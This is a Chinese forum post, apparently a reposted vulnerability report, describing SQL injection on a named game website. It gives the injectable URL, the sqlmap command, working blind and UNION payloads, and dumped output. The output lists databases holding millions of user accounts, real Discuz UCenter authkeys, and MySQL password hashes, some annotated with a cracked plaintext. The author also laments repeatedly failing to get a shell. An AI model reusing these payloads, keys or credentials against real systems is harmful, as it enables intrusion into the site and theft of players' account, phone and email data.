HanDs
管理员

[7月漏洞公开] 游戏安全之欢畅游戏官网SQL注入/涉及600万玩家手机邮箱帐号密码安全 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

shell不了好悲伤

详细说明:

在登录游戏的时候有注入点,UNION

code 区域
http://long.gamebean.com/game_enter.php?s_id=1



跑sqlmap

code 区域
sqlmap -u 'http://long.gamebean.com/game_enter.php?s_id=1' --dbs
_
___ ___| |_____ ___ ___ {1.0.4.4#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:59:19

[09:59:19] [INFO] resuming back-end DBMS 'mysql'
[09:59:20] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.gamebean.com/login.php?ref=long.gamebean.com/dnslist.php'. Do you want to follow? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: s_id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))OztZ) AND 'RdBD'='RdBD

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: s_id=-8227' UNION ALL SELECT CONCAT(0x716a6b6a71,0x78514469644943624c58794a73766a6954436456654979657a6e6658516564716145435362735458,0x71626a7171),NULL-- -
---
[09:59:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL 5.0.12
[09:59:23] [INFO] fetching database names
[09:59:23] [INFO] the SQL query used returns 24 entries
available databases [24]:
[*] analyze
[*] android
[*] bbs
[*] cjsh_user
[*] cms
[*] dx
[*] football
[*] game_stat
[*] gcenter
[*] gs
[*] information_schema
[*] lt_wap
[*] mis
[*] mysql
[*] ourpalm
[*] ssfee_platform
[*] ssfee_platform_test
[*] test
[*] test_channel
[*] union
[*] user
[*] user2406
[*] webpay
[*] yjws





涉及全站24个库

漏洞证明:

其中bbs库和user库和ssfee_platform推广平台库里面有200W+450W+560W用户帐号密码手机邮箱信息,去重后大约有600W用户

code 区域
Database: bbs
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| uc_memberfields | 1980846 |
| uc_members | 1980846 |
| cdb_favoritethreads | 46470 |
| cdb_prompt | 21412 |
| cdb_memberfields | 18489 |
| cdb_members | 18488 |
| cdb_posts | 9945 |
| cdb_onlinetime | 8183 |
| cdb_threads | 3357 |
| uchome_creditlog | 1660 |
| cdb_promptmsgs | 1321 |
| uchome_pic | 1320 |
| uchome_tagblog | 1118 |
| uc_pms | 1095 |
| cdb_threadsmod | 709 |
| cdb_modworks | 666 |
| cdb_rsscaches | 651 |
| uchome_blog | 502 |
| uchome_blogfield | 502 |
| uchome_member | 483 |
| uchome_space | 483 |
| uchome_spacefield | 483 |
| uchome_album | 464 |
| uchome_feed | 425 |
| cdb_threadtags | 340 |
| uchome_spaceinfo | 320 |
| cdb_stylevars | 282 |
| uchome_stat | 245 |
| cdb_settings | 244 |
| cdb_tags | 243 |
| uchome_tag | 209 |
| uchome_friend | 126 |
| uchome_usertask | 96 |
| cdb_smilies | 80 |
| cdb_statvars | 73 |
| uc_newpm | 66 |
| cdb_typeoptions | 65 |
| uchome_notification | 65 |
| uchome_config | 64 |
| uchome_comment | 62 |
| cdb_forumfields | 55 |
| cdb_forums | 55 |
| cdb_stats | 52 |
| uchome_creditrule | 47 |
| cdb_spacecaches | 42 |
| cdb_caches | 41 |
| uc_notelist | 38 |
| cdb_faqs | 34 |
| uchome_visitor | 32 |
| cdb_request | 30 |
| uc_friends | 29 |
| cdb_debateposts | 28 |
| cdb_favorites | 28 |
| cdb_favoriteforums | 25 |
| uchome_magic | 25 |
| cdb_magiclog | 24 |
| uc_settings | 24 |
| uchome_doing | 24 |
| uchome_magicstore | 24 |
| uchome_poke | 22 |
| uchome_magicinlog | 21 |
| uchome_post | 21 |
| uchome_usermagic | 21 |
| uchome_polloption | 20 |
| uchome_thread | 20 |
| cdb_usergroups | 19 |
| cdb_failedlogins | 18 |
| uchome_share | 18 |
| cdb_moderators | 17 |
| uchome_click | 15 |
| cdb_ratelog | 14 |
| cdb_taskvars | 14 |
| cdb_crons | 12 |
| cdb_forumlinks | 12 |
| cdb_magics | 12 |
| cdb_projects | 11 |
| cdb_reportlog | 11 |
| uchome_magicuselog | 10 |
| cdb_words | 9 |
| uchome_usergroup | 9 |
| cdb_admingroups | 7 |
| cdb_polloptions | 7 |
| cdb_tasks | 7 |
| uchome_task | 7 |
| cdb_access | 6 |
| cdb_feeds | 6 |
| cdb_prompttype | 6 |
| cdb_styles | 6 |
| cdb_templates | 6 |
| uchome_eventclass | 6 |
| uchome_mtag | 6 |
| uchome_polluser | 6 |
| uchome_tagspace | 6 |
| cdb_attachments | 5 |
| cdb_navs | 5 |
| cdb_ranks | 5 |
| uchome_cron | 5 |
| cdb_admincustom | 4 |
| cdb_bbcodes | 4 |
| cdb_onlinelist | 4 |
| cdb_searchindex | 4 |
| cdb_typemodels | 4 |
| uchome_data | 4 |
| uchome_poll | 4 |
| uchome_pollfield | 4 |
| cdb_imagetypes | 3 |
| cdb_warnings | 3 |
| uc_applications | 3 |
| uchome_class | 3 |
| uchome_profield | 3 |
| uchome_report | 3 |
| uchome_statuser | 3 |
| cdb_addons | 2 |
| cdb_debates | 2 |
| cdb_polls | 2 |
| cdb_adminactions | 1 |
| cdb_adminsessions | 1 |
| cdb_attachmentfields | 1 |
| uc_admins | 1 |
| uc_failedlogins | 1 |
| uc_protectedmembers | 1 |
+----------------------+---------+



code 区域
Database: user
+--------------------+---------+
| Table | Entries |
+--------------------+---------+
| channel_extend | 12501938 |
| members_info | 4550839 |
| members_0 | 650074 |
| members_6 | 648069 |
| members_4 | 647573 |
| members_8 | 646946 |
| members_2 | 646486 |
| members_7 | 640523 |
| members_5 | 640124 |
| members_3 | 638772 |
| members_1 | 638475 |
| members_9 | 638271 |
| members_football | 66598 |
| membersinfo_0 | 29646 |
| membersinfo_6 | 29350 |
| membersinfo_4 | 29293 |
| membersinfo_5 | 29186 |
| membersinfo_2 | 29133 |
| membersinfo_8 | 29063 |
| membersinfo_3 | 28919 |
| membersinfo_7 | 28804 |
| membersinfo_1 | 28781 |
| membersinfo_9 | 28705 |
| footballuser_copy1 | 21563 |
| members_point | 20073 |
| members_fmworlds | 5047 |
| zq_point | 2703 |
| a | 1355 |
| footballuser | 1000 |
| invite | 25 |
| partner | 11 |
+--------------------+---------+



code 区域
Database: ssfee_platform
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| p_user_ip | 6538408 |
| user_info_201112 | 5643243 |
| user_info | 3971775 |
| p_area | 2869631 |
| advt_stat_hour_201201TO06 | 2474046 |
| user_info_201102 | 2234956 |
| register_after | 1738043 |
| advt_stat_hour | 1559224 |
| advt_stat_channel | 1082289 |
| advt_stat_hour_201101TO07 | 1069454 |
| u_ip | 376052 |
| advt_stat_hour_201101TO02 | 344281 |
| jiaose_sssg | 186520 |
| temp4 | 139504 |
| advt_stat_ye | 117002 |
| advt_stat_hour_20108TO10 | 101229 |
| p_area_Integration | 57078 |
| temp2 | 56822 |
| p_newsbase_201206 | 49845 |
| p_ip | 45309 |
| advt_stat_nq | 43122 |
| p_area_Integration_ip | 25881 |
| seek_gateway_fee | 24020 |
| p_area_register | 21292 |
| seek_gateway_fee_bak | 19978 |
| wapgame_zhuce | 19034 |
| jiaose_long | 16060 |
| user_info_mj | 11834 |
| sms_fee | 7404 |
| temp3 | 4679 |
| get_user | 4035 |
| wapgame_fee | 3921 |
| wapgame_fee_bak | 3626 |
| p_newsbase_tmp | 3421 |
| pc_jiaose | 3134 |
| user_stat | 2809 |
| p_ad_info | 2590 |
| seek_gateway_chengben | 2381 |
| seek_gateway_chengben_bak | 2368 |
| p_user_ip_copy | 2355 |
| wapgame_fee_201109 | 2355 |
| sms_fee1 | 1772 |
| jiaose_yan | 1096 |
| p_newscontent | 966 |
| wapgame_zhuce_tmp | 927 |
| p_ad | 895 |
| p_area_Integration_copy | 742 |
| lm_info | 704 |
| p_newsbase | 665 |
| haoduan_ds | 345 |
| bd | 295 |
| bd2 | 295 |
| lm_info_test | 288 |
| netgame_stat | 243 |
| temp | 216 |
| seek_gateway_fee_tmp1 | 154 |
| p_area_Integration_ip_copy2 | 132 |
| p_area_Integration_ip_copy1 | 118 |
| p_area_Integration_ip_ddd | 118 |
| p_area_Integration_test_copy1 | 116 |
| baidu | 112 |
| wapgame_fee_tmp | 101 |
| p_user_ip_are | 99 |
| seek_gateway_fee_g9 | 92 |
| kuapintai_fee | 91 |
| jiaose_ly | 70 |
| u_manage | 68 |
| advt_stat_tmp | 62 |
| seek_gateway_fee_tmp | 62 |
| seek_gateway_fee_lr | 60 |
| u_admin | 60 |
| netgame_stat_tmp | 49 |
| sms_fee2 | 48 |
| p_area_Integration_ip_copy | 36 |
| sms_fee3 | 24 |
| seek_gateway_chengben_lr | 17 |
| u_group | 15 |
| seek_gateway_chengben_tmp | 14 |
| wapgame_fee_bf2015 | 12 |
| p_user_ip_tmp | 10 |
| data_manage | 9 |
| p_newsclass | 9 |
| wapgame_qudao | 9 |
| p_admin | 6 |
| p_area_Integration_test_copy | 6 |
| seek_gateway_xz | 6 |
| data_admin | 4 |
| jiaose_djh | 4 |
| yuan | 4 |
| data_group | 2 |
| p_adver_admin | 2 |
| ios_xml | 1 |
| p_config | 1 |
+-------------------------------+---------+





以及泄漏discuz的uckey

code 区域
Database: bbs
Table: uc_applications
[3 entries]
+-------+---------+---------------------------+------------+--------+-----------------------------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| appid | ip | url | name | type | extra | charset | authkey | recvnote | synlogin | dbcharset | viewprourl | apifilename | tagtemplates |
+-------+---------+---------------------------+------------+--------+-----------------------------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | <blank> | http://219.232.240.2/home | 个人家园 | UCHOME | <blank> | utf-8 | F0q1C5wclbJcieF6i6F03d3eDd37V4K10aG6y5I7qeEd97mcN3b3t43a21UfGai6 | 1 | 1 | utf8 | <blank> | uc.php | <?xml version="1.0" encoding="ISO-8859-1"?>\r\n<root>\r\n <item id="template"><![CDATA[<a href="{url}" target="_blank">{subject}</a>]]></item>\r\n <item id="fields">\r\n <item id="subject"><![CDATA[日志标题]]></item>\r\n <item id="uid"><![CDATA[用户 ID]]></item>\r\n <item id="username"><![CDATA[用户名]]></item>\r\n <item id="dateline"><![CDATA[日期]]></item>\r\n <item id="spaceurl"><![CDATA[空间地址]]></item>\r\n <item id="url"><![CDATA[日志地址]]></item>\r\n </item>\r\n</root> |
| 2 | <blank> | http://219.232.240.2/bbs | Discuz! | DISCUZ | <blank> | utf-8 | P221cb87c9h7a0s7v8b533eeL0X939dfQ9uc16K7b4Ieh6U1Wbg0X2h3K3S854v4 | 1 | 1 | utf8 | <blank> | uc.php | <?xml version="1.0" encoding="ISO-8859-1"?>\r\n<root>\r\n <item id="template"><![CDATA[<a href="{url}" target="_blank">{subject}</a>]]></item>\r\n <item id="fields">\r\n <item id="subject"><![CDATA[标题]]></item>\r\n <item id="uid"><![CDATA[用户 ID]]></item>\r\n <item id="username"><![CDATA[发帖者]]></item>\r\n <item id="dateline"><![CDATA[日期]]></item>\r\n <item id="url"><![CDATA[主题地址]]></item>\r\n </item>\r\n</root> |
| 3 | <blank> | http://www.gamebean.com | gamebean门户 | OTHER | a:1:{s:7:"apppath";s:0:"";} | <blank> | b1f3g6Fp/bNb5b5yiaD0/DlK2j4ZoEv5FxmjqvbMU4uHv/6+Xj2l9pU | 0 | 0 | <blank> | <blank> | uc.php | <?xml version="1.0" encoding="ISO-8859-1"?>\r\n<root>\r\n <item id="template"><![CDATA[]]></item>\r\n</root> |
+-------+---------+---------------------------+------------+--------+-----------------------------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+





getshell不了



数据库密码

code 区域
Database: mysql
Table: user
[39 entries]
+--------------+-------------------------------------------+---------------+
| user | password | host |
+--------------+-------------------------------------------+---------------+
| root | *4B40B8C66CD7F7380E398A0CEBE5C6F388DD2995 | localhost |
| admin | *3BD10CEA2A23736837BB5F0EDF1A80DC5EE4B91A | 127.0.0.1 |
| root | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | % |mysql228
| cctv | *9B91D3DD2A6DF0D4BD53BB9716EA231BE173D7B2 | % |
| channel | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | % |mysql228
| rsync | *B8275A0D97CC0A636920525D16CD8F2FFE137971 | % |
| test | *94BDCEBE19083CE2A1F959FD02F964C7AF4CFC29 | % |
| gamebean | *9D7CD5A312DB9732C250F6009DC97C4027846EDD | % |
| wapgame | *028E35F5FDD9A172849C808EBE9A45938A3571E4 | % |
| slave | *093D835F112A3BCBA1C39EFEFD1ADF934EEB2C8A | % |
| repl | *3028A46C5F893BB70BFAA40E5F0C90F8BAD8E07A | % |
| bbs | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | % |mysql228
| cms | *0DBB9DEC9800F895124E2D292E12D2CBE5565C58 | % |
| huawb | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | % |
| wangdy | *BE0BC36D760FFE1627F567894CE8EA4F692E819A | % |
| huawbtg | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | % |
| zuol | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | % |
| backup | *1827DC630AAEB1E997DB2B212CC94EFD9C431555 | 114.112.69.51 |
| huawb | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.203 |
| huawb | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.201 |
| huawbtg | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.201 |
| huawbtg | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | 117.79.91.203 |
| dbbackup | *B8EA50B347976D08DBA6AFF751926429A04881EF | 172.16.% |
| wangyf | *4BE66E5176633B8101188EE0272832E033EA48F1 | % |
| bxb | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | % |
| gamebean_web | *54D36154FCBD065DFE7269E85C135EDB0DC715B8 | 219.232.240.2 |
| root_backup | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | 172.16.10.88 |mysql228
| qingjingli | *773E83E4FDE66994A6E5A4948E27332A199A157E | % |
| backup | *3584A73767611418363012358FAFC887749A25E7 | 113.31.91.159 |
| admin | *3BD10CEA2A23736837BB5F0EDF1A80DC5EE4B91A | localhost |
| nagios | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 172.16.108.% |
| mysqld | *B3500AC7C3F7205937036E78E40C103832F68BE6 | localhost |
| dbbackup | *B8EA50B347976D08DBA6AFF751926429A04881EF | 127.0.0.1 |
| root | *897DE3F7682CB1C851C5375B41C535B53D4C94B2 | 127.0.0.1 |mysql228
| dbbackup | *B8EA50B347976D08DBA6AFF751926429A04881EF | % |
| nagios | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 219.232.240.6 |
| nagios | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 219.232.240.2 |
| nagios | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | 113.31.91.159 |
| nagios | *C58DF49CBD40A6961EFF81BD14E4F9A84EF247ED | % |
+--------------+-------------------------------------------+---------------+



找不到服务器ip





还是shell不了呀 哎

修复方案:

过滤sql


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
游戏
#1楼
发帖时间:2016-7-14   |   查看数:0   |   回复数:0
游客组
快速回复